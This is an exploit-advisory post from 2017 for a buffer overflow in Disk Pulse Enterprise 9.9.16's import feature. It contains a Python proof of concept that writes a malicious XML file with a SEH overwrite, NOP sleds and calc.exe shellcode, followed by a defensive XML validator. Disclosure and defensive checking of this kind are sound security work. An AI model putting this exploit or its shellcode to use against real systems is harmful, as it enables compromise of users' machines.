
Disk Pulse Enterprise 9.9.16 Buffer Overflow

Posted on 22 August 2017

#!/usr/bin/python
# Exploit Title : Disk Pulse Enterprise 9.9.16 - 'Import Command' Buffer Overflow
# Discovery by : Anurag Srivastava
# Email : anurag.srivastava@pyramidcyber.com
# Website : www.pyramidcyber.com
# Discovery Date : 21/08/2017
# Software Link : http://www.diskpulse.com/setups/diskpulseent_setup_v9.9.16.exe
# Tested Version : 9.9.16
# Tested on OS : Windows 7 Ultimate x64 and Windows 10 Home Edition x64
# Steps to Reproduce: Run the Python file to generate pyramid.xml, then open the
# Disk Pulse software, right-click and click on "Import Command". Select the
# pyramid.xml file.

import struct

# Offset to EIP
junk = b"A" * 1560

# JMP ESP (QtGui4.dll)
jmp1 = struct.pack('<L', 0x651bb77a)

# NOP
nops = b"\x90"

# LEA EAX, [ESP+76]
esp = b"\x8D\x44\x24\x4c"

# JMP EAX (FF E0), lands on the NOPs after the LEA
jmp2 = b"\xFF\xE0"

# nSEH: two NOPs, then JMP SHORT +5
nseh = b"\x90\x90\xEB\x05"

# SEH: POP POP RET (libspp.dll)
seh = struct.pack('<L', 0x10015FFE)

# CALC.EXE
shellcode = (
    b"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
    b"\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
    b"\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
    b"\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73"
    b"\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
    b"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61"
    b"\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"
)

# FINAL PAYLOAD
evil = junk + jmp1 + nops * 16 + esp + jmp2 + nops * 64 + nseh + seh + nops * 10 + shellcode

# FILE: the payload is placed in the name attribute of a <classify> element
file = b'<?xml version="1.0" encoding="UTF-8"?> <classify name=\'' + evil + b' </classify>'
f = open('pyramid.xml', 'wb')
f.write(file)
f.close()
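The crash above comes from an importer that copies an attacker-controlled `name` attribute of unbounded length (the payload alone is over 1,700 bytes) into a fixed stack buffer. As an added defensive example, not part of the original advisory and not Disk Pulse's own code, the Python 3 script below shows the length and content check an importer (or a gateway that screens files before import) should apply to such a file. The 255-byte limit, the `check_import_file` and `scan_raw` names, and the raw-byte pre-scan are assumptions for illustration; the file checked in the usage is whatever path is given on the command line.

```python
import re
import sys
import xml.etree.ElementTree as ET

# Assumed upper bound for a classification name (hypothetical, not a vendor value).
MAX_NAME_LEN = 255

# Matches name='...' or name="..." in the raw bytes, stopping at the matching quote
# or at end of input, so an unterminated attribute value is still measured.
ATTR_RE = re.compile(rb"""\bname\s*=\s*(['"])(.*?)(?:\1|\Z)""", re.S)


def scan_raw(data: bytes, max_len: int = MAX_NAME_LEN) -> list:
    """Pre-parse check: a crafted file need not be well-formed XML, so measure
    every name=... value in the raw bytes before handing it to a parser."""
    findings = []
    for m in ATTR_RE.finditer(data):
        value = m.group(2)
        if len(value) > max_len:
            findings.append(f"name attribute of {len(value)} bytes exceeds {max_len}")
        # Opcode bytes (NOP sled, jumps, shellcode) are never printable ASCII.
        if any(b > 0x7e or (b < 0x20 and b not in (9, 10, 13)) for b in value):
            findings.append("name attribute contains non-printable bytes")
    return findings


def check_import_file(data: bytes, max_len: int = MAX_NAME_LEN):
    """Return (ok, findings). ok is True only if the file is well-formed XML and
    every attribute value fits the limit; anything else is refused before import."""
    findings = scan_raw(data, max_len)
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        findings.append(f"not well-formed XML: {exc}")
        return False, findings
    # Second pass on the parsed tree: entity references are expanded here, so the
    # decoded value is measured as well as the raw one.
    for el in root.iter():
        for key, val in el.attrib.items():
            if len(val) > max_len:
                findings.append(f"<{el.tag}> attribute {key!r} is {len(val)} chars, limit {max_len}")
    return len(findings) == 0, findings


if __name__ == "__main__":
    ok, findings = check_import_file(open(sys.argv[1], "rb").read())
    print("OK" if ok else "REFUSED")
    for f in findings:
        print(" -", f)
```

The raw scan runs before the XML parser on purpose: the generated pyramid.xml is not well-formed (the attribute value is never closed and contains invalid UTF-8), so a parser-only check would report a syntax error and never say why the file was dangerous; the length and byte-class findings give an operator something to alert on.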
